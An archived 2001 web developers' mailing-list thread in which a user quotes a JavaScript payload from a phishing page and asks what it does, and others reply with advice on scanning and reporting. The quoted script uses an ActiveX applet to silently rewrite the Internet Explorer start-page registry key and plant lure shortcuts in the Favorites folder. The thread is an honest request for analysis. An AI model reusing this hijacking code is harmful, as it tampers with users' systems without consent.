Re: Not so nice JS intruding on a computer without ones knowledge

by "Nancy Whittley" <NWHITTLEY(at)cinci.rr.com>

 Date:  Sat, 11 Aug 2001 10:41:23 -0400
 To:  "Webmaster(at)kapnkreations.com" <webmaster(at)kapnkreations.com>,
"Hwg-Techniques \(E-mail\)" <hwg-techniques(at)hwg.org>
 References:  kapnkreations
  todo: View Thread, Original
Yes I agree, I see the registry keys there.  The script didn't do as it was
designed.  I have no favorites marked that way and It wasn't able to change
my home page as I figure the script is attempting.  However, I tracked down
the site owner, the isp this is located on, the isp from the email, and all
that.   I have never really actively pursued a spammer, but would like to
really go after this one.

Anyone know how to do that?   This is a nasty thing, and I think the isp
where the site is housed, should know.  I am writing letters as we speak.

Nancy


Ouch!  Those look frightfully like registry settings......(I am a Mac
Developer so I apologize if my syntax is incorrect)!  I tend to delete
immediately anything that arrives from suspicious sources - not even
previewing in the preview pane.

I would run some serious diagnostics on your machine....anti-virus, some
disk utilities, etc.


--
Blane Warrene
Chief Technology Officer
Kap`n Kreations | Internet Solutions
cto(at)kapnkreations.com
http://www.kapnkreations.com

> From: "Nancy Whittley" <NWHITTLEY(at)cinci.rr.com>
> Date: Fri, 10 Aug 2001 16:57:27 -0400
> To: "Hwg-Techniques \(E-mail\)" <hwg-techniques(at)hwg.org>
> Subject: Not so nice JS intruding on  a computer without ones knowledge
>
> Hello,
>
> I am curious.  I got an email, and it had a simple message..  Your
password
> has been changed.  To restore your password click here.  Well I knew it
was
> a trap of sorts, but to stay on top of things I went there any way.
>
> When I got there it was a blank page, that said your password has been
> restored.  Nothing esle.  Website I have never seen before.  In viewing
the
> html, the page calls up a javascript.
>
> I captured the script below:  Would someone please tell me what all this
> thing has done?  Obviously it is attempting to make changes to my
registry,
> favorites folder, but what else has is it doing?
> Thanks in Advance
> Nancy
> (I changed the two urls that it included to generics to use as examples.
I
> had just had a friend experiece this and it is very angering for me.)
>
> _________________________________________
>
> document.write("<APPLET HEIGHT=0 WIDTH=0
> code=com.ms.activeX.ActiveXComponent></APPLET>")
>
>
>
> function AddFavLnk(loc, DispName, SiteURL)
> {
> var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
> Shor.TargetPath = SiteURL;
> Shor.Save();
> }
>
> function f(){
> try
> {
> a1=document.applets[0];
> a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
> a1.createInstance();
> Shl = a1.GetObject();
> a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
> a1.createInstance();
> FSO = a1.GetObject();
> a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
> a1.createInstance();
> Net = a1.GetObject();
>
> try{
>
> var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 *
90));
> document.cookie="Chg=general; expires=" + expdate.toGMTString() + ";
> path=/;"
>
>
>
////////////////////////////////////////////////////////////////////////////
> ///��ҳ
>
>
> Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start
> Page", "http://badwebsitename here/");
> var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 *
90));
> document.cookie="Chg=general; expires=" + expdate.toGMTString() + ";
> path=/;"
> var WF, Shor, loc;
> WF = FSO.GetSpecialFolder(0);
> loc = WF + "\\Favorites";
>
> if(!FSO.FolderExists(loc))
> {
> loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName +
> "\\Favorites";
> if(!FSO.FolderExists(loc))
> {
> return;
> }
> }
>
>
////////////////////////////////////////////////////////////////////////////
> ///�ղؼ�
>
>
> AddFavLnk(loc, " Britney Spears Nude", "http://www.whatever.com");
> AddFavLnk(loc, " Aol", "http://www.aol.com");
> }
> catch(e){ }
> }
> catch(e){ }
> }
> function init(){
> setTimeout("f()", 1000);
> }
> init();
> _______________________________________________
>

HWG hwg-techniques mailing list archives, maintained by Webmasters @ IWA